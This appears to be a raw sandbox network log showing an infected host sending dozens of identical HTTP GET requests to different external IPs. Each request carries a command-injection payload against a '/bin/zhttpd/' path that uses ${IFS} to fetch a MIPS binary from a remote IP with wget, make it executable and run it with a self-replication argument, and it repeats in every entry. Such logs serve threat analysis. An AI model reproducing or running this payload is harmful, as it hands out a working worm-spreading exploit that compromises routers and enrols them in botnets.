                                      Jan 19, 2024 17:29:39.914988995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6199192.168.2.145520458.34.210.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915009022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6200192.168.2.145841698.168.77.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915062904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6201192.168.2.1454324168.70.79.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915095091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6202192.168.2.1438596172.144.109.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915131092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6203192.168.2.144073689.65.149.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915188074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6204192.168.2.1460714122.180.217.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915216923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6205192.168.2.1444724205.132.75.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915271044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6206192.168.2.1441994116.77.193.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915296078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6207192.168.2.143557852.231.162.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915330887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6208192.168.2.143871052.165.95.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915373087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6209192.168.2.144454244.34.120.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915393114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6210192.168.2.144105451.83.124.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915429115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6211192.168.2.1440672102.200.67.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915483952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6212192.168.2.145869076.118.134.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915524006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6213192.168.2.144519088.77.222.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915591955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6214192.168.2.1434700101.187.135.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915636063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6215192.168.2.1456626143.55.80.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915671110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6216192.168.2.1443298219.251.149.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915712118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6217192.168.2.1445520116.203.104.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915747881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6218192.168.2.144238878.58.144.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915805101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6219192.168.2.143505231.245.99.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915812016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6220192.168.2.1455700183.199.121.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915862083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6221192.168.2.144215466.4.79.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915916920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6222192.168.2.144774878.41.158.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.915963888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6223192.168.2.1450684171.228.103.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916011095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6224192.168.2.143913051.190.149.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916075945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6225192.168.2.1439036165.126.114.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916126966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6226192.168.2.1441544119.115.164.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916178942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6227192.168.2.1434660211.203.14.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916218042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6228192.168.2.1460040192.233.56.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916259050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6229192.168.2.1450812113.153.72.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916297913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6230192.168.2.1448058131.2.9.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916344881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6231192.168.2.1446438112.57.205.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916385889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6232192.168.2.1441002171.247.193.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916420937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6233192.168.2.1450632156.50.74.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916496038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6234192.168.2.1442124168.246.33.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916520119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6235192.168.2.144559899.53.249.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916538000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6236192.168.2.145344654.41.24.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916569948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6237192.168.2.143796287.148.62.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916626930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6238192.168.2.144347450.230.35.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916649103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6239192.168.2.145599253.84.209.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916690111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6240192.168.2.1446606209.204.63.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916723967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6241192.168.2.145447452.128.140.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916778088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6242192.168.2.1442362123.95.134.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916804075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6243192.168.2.1457528157.22.189.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916822910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6244192.168.2.145200297.98.199.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916889906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6245192.168.2.1442938137.255.2.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916907072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6246192.168.2.1453874108.30.62.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.916960001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6247192.168.2.144619279.175.18.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917011976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6248192.168.2.1454962185.190.91.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917051077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6249192.168.2.145309214.91.162.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917081118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6250192.168.2.1452908171.37.10.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917109966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6251192.168.2.14516628.161.72.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917160034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6252192.168.2.1453680113.66.88.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917188883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6253192.168.2.1434152221.25.91.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917215109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6254192.168.2.144503442.214.183.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917268991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6255192.168.2.145528457.38.106.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917320967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6256192.168.2.1438680172.109.182.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917342901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6257192.168.2.1448346117.234.122.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917414904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6258192.168.2.1448856190.102.169.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917428017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6259192.168.2.1440174161.116.224.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917470932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6260192.168.2.1442360101.166.25.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917510033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6261192.168.2.1454480204.64.111.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.917555094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6262192.168.2.1454614216.7.242.239443
                                      TimestampBytes transferredDirectionData
